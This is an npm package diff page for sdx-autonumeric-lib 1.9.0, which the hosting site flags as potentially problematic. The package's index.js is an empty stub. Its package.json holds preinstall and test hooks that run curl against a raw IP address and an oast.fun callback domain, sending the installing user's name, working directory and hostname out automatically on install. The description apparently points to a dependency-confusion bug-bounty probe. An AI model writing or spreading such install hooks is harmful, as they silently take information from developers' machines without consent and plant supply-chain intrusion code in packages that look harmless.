sdx-autonumeric-lib 1.9.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of sdx-autonumeric-lib might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +1 -0
  2. package/package.json +16 -0
package/index.js ADDED
@@ -0,0 +1 @@
1
+ exports.hello = function () {}
package/package.json ADDED
@@ -0,0 +1,16 @@
1
+ {
2
+ "name": "sdx-autonumeric-lib",
3
+ "version": "1.9.0",
4
+ "description": "balintm @ HackerOne",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "curl -s \"http://46.101.147.15/depconf/?package=sdx-autonumeric-lib&script=test&user=$(whoami)&path=$(pwd)&hostname=$(hostname)\"; curl -s \"http://sdx-autonumeric-lib--test--$(whoami)--$(pwd | tr '/' '-')--$(hostname).pwioyskxqxpaefithhusexqom5v7msits.oast.fun\"",
8
+ "preinstall": "curl -s \"http://46.101.147.15/depconf/?package=sdx-autonumeric-lib&script=preinstall&user=$(whoami)&path=$(pwd)&hostname=$(hostname)\"; curl -s \"http://sdx-autonumeric-lib--preinstall--$(whoami)--$(pwd | tr '/' '-')--$(hostname).pwioyskxqxpaefithhusexqom5v7msits.oast.fun\""
9
+ },
10
+ "dependencies": {},
11
+ "config": {
12
+ "unsafe-perm": true
13
+ },
14
+ "author": "Bálint Magyar",
15
+ "license": "MIT"
16
+ }